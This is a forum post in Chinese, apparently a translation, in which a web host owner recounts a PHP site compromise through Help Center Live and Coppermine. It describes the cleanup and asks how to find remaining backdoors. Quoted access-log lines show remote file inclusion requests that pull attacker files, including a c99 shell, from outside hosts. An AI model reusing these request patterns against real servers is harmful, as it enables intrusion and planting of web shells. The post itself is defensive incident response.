有时,我的共享托管环境会受到损害,因为我未能对已安装的应用程序组合进行修补。上周,这是因为安装了一个旧的且未使用的 PHP 应用程序,称为 Help Center Live。结果是服务器上的每个 PHP 文件(我有几个 Wordpress、Joomlas、SilverStripe 安装)都添加了代码,这些代码从其他站点中提取隐藏链接并将它们包含在我的页面中。在这种攻击之后,其他人报告说他们的网站被 Google 禁止了 - 幸运的是,我似乎很早就发现了它。我只是在从我的手机浏览到其中一个站点时才注意到它 - 该页面包含移动浏览器中包含的链接。
我在日志中发现了很多这样的攻击尝试:
62.149.18.193 - - [06/Feb/2009:14:52:45 +0000] "GET /support/module.php?module= HelpCenter//include/main.php?config [search_disp]=true&include_dir= http:// /www.portlandonnuri.com/2008_web//technote7/data/photo/id2.txt ??? HTTP/1.1" 200 26"-""libwww-perl/5.814"
我立即删除了这个应用程序,并编写了一个脚本,从每个源文件中删除了有问题的 PHP 代码。我还发现该脚本创建了 HTML 文件,其中包含要包含的其他受感染站点的链接。我也删除了它们。现在我担心攻击者可能留下了我错过的其他东西 - 一个 PHP 文件,可以让他永久访问。文件日期在攻击中都被修改了,我找不到在相关时间段内更改的任何其他文件。为了确保我的服务器上没有后门,我是否遗漏了一些明显的东西?
编辑:我还搜索包含攻击代码的文本文件,就像上面的日志文件片段中显示的那样。我没有找到。
另一个编辑:如果你碰巧看到这篇文章是因为你发现自己处于同样的情况,也许这会对你有所帮助。在操作它们之前,我用它来备份我的所有 PHP 源文件:
find . -name *.php -exec tar -uvf ~/www/allphp.tar {} \;
这是为了撤消攻击者所做的更改:
find . -name *.php -exec sed -i '/<?php \/\*\*\/eval(base64_decode(/d' {} \;
不是火箭科学,但对于像我这样的偶尔的 Linux/Unix 用户来说也不是微不足道的:-)。
另一个编辑:我无法审核服务器上的每一行代码,但我可以搜索可疑数据。我搜索了所有出现的“eval”和“base64”,但没有找到任何看起来不合法的东西。然后我为“.ru”运行了一个 grep(因为肇事者似乎来自那里),你瞧,发现了一个叫做 c99 shell 的东西,我很快就把它删除了。
最终编辑:我发现了 c99 shell 是如何上传的——通过 Coppermine 照片库中的一个洞。
97.74.118.95 - - [03/Feb/2009:00:31:37 +0000] "POST
/pics/picEditor.php?img_dir=http://xakforum.altnet.ru/tmp_upload/files
/c99shell.txt&CURRENT_PIC[filename]=/1.php HTTP/1.1" 404 - "-" "-"
97.74.118.95 - - [03/Feb/2009:00:32:24 +0000] "
GET /pics/albums/1.php HTTP/1.1" 200 25352 "-" "-"
顺便说一句,IP 地址是 Godaddy 托管的 IP。